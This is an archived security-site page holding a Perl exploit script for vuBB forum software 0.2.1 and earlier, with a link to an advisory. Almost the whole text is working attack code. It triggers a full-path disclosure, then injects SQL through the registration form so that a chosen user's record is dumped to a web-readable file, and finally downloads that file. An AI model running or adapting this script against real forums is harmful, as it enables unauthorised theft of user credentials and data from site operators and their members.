TUCoPS :: Web BBS :: etc :: b06-3144.htm

vuBB <= 0.2.1 SQL Injection Exploit + Advisory link
vuBB <= 0.2.1 SQL Injection Exploit + Advisory link
vuBB <= 0.2.1 SQL Injection Exploit + Advisory link


#!/usr/bin/perl=0D
#=0D
# by DarkFig -- acid-root.new.fr=0D
# French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt=0D 
#=0D
use IO::Socket;=0D
use LWP::Simple;=0D
=0D
=0D
# Header=0D
print "\r\n+---------------------------------------+", "\r\n";=0D
print "|  vuBB <= 0.2.1 [BFA] SQL Injection   -|", "\r\n";=0D
print "+---------------------------------------+", "\r\n";=0D
=0D
=0D
# Usage=0D
if(!$ARGV[2]){=0D
  print "| Usage:    ------|", "\r\n";=0D
  print "+---------------------------------------+", "\r\n";=0D
exit;=0D
}=0D
=0D
=0D
# Host=0D
if($ARGV[0] =~ /http:\/\/(.*)/){=0D
  $host = $1;=0D
} else {=0D
  $host = $ARGV[0];=0D
}=0D
print "[+]Host: $host\r\n";=0D
=0D
=0D
# Var=0D
my $path = $ARGV[1];=0D
my $user = $ARGV[2]; print "[+]User: $user\r\n";=0D
my $port = 80;=0D
my $fpd = "http://".$host.$path."includes/vubb.php";=0D 
my $err1 = "[-]Can't connect to the host\r\n";=0D
my $err2 = "[-]Can't retrieve the full path\r\n";=0D
my $err3 = "[-]Can't retrieve the results\r\n";=0D
my $poti = "POST "."$path"."index.php?act=register&action=register"." HTTP/1.1";=0D
=0D
=0D
# Full Path Disclosure=0D
$req0 = get($fpd) or die print $err1 and end();=0D
if($req0 =~ /in (.*)\/includes\/vubb.php<\/b>/) {=0D
  $fullpath = $1."/thisismypasswd.txt";=0D
  print "[+]Path: $1\r\n";=0D
} else {=0D
  print $err2 and end();=0D
}=0D
=0D
=0D
# Malicious data=0D
my $pdat = "user=$user"."%27+INTO+OUTFILE+%27"."$fullpath"."%27%23"."&email=a669c4570f%40hotmail.com&vemail=a669c4570f%40hotmail.com&pass=mypassword&vpass=mypassword&agreement=iacceptohackit&agree=on";=0D
my $ldat = length $pdat;=0D
my $req1 = IO::Socket::INET->new(=0D
                                 PeerAddr => $host,=0D
                                 PeerPort => $port,=0D
                                 Proto => "tcp"=0D
                                    ) or print $err1 and end();=0D
print $req1 "$poti", "\r\n";=0D
print $req1 "Host: $host", "\r\n";=0D
print $req1 "Content-Type: application/x-www-form-urlencoded", "\r\n";=0D
print $req1 "Content-Length: $ldat", "\r\n\n";=0D
print $req1 "$pdat", "\r\n";=0D
close($req1);=0D
=0D
=0D
# Results=0D
$req2 = get("http://".$host.$path."/thisismypasswd.txt") or print $err3 and end();=0D 
open(f, ">VUBB_RESULT.txt");=0D
print f $req2;=0D
close(f);=0D
print "[+]Done: VUBB_RESULT.txt\r\n";=0D
end();=0D
=0D
=0D
# Bye=0D
sub end {=0D
print "+---------------------------------------+", "\r\n";=0D
exit;=0D
}

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH